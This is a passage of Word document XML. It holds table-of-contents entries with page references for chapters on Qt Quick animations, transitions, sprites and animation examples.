            <w:webHidden/>
          </w:rPr>
          <w:t>274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42" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animation and Transitions in Qt Quick</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605542 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>274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43" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Animation and Transitions Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605543 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>274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44" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Triggering Animations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605544 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>275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45" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Direct Property Animation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605545 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>275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46" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using Predefined Targets and Properties</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605546 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>276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47" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Transitions during State Changes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605547 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>277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48" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Default Animation as Behaviors</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605548 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>278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49" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Playing Animations in Parallel or in Sequence</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605549 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>279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50" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Controlling Animations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605550 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>280</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51" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animation Playback</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605551 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>280</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52" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Easing</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605552 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>280</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53" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Other Animation Types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605553 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>280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54" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Sharing Animation Instances</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605554 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>281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55" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Using Qt Quick Behaviors with States</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605555 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>281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56" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Sprite Animations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605556 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>285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57" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Sprite Engine</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605557 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>285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58" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>State Machine</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605558 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>285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59" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Input Format</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605559 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>287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60" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Types Using the Sprite Engine</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605560 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>288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61" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AnimatedSprite Type</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605561 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>289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62" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
          </w:rPr>
          <w:t>Qt Quick Examples - Animation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605562 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>289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63" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Running the Example</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605563 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>290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64" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ColorAnimation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605564 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>290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65" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PropertyAnimation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605565 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>291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66" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Animators</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605566 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>291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67" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Behaviors</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605567 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>292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68" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Wiggly Text</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605568 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>292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69" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
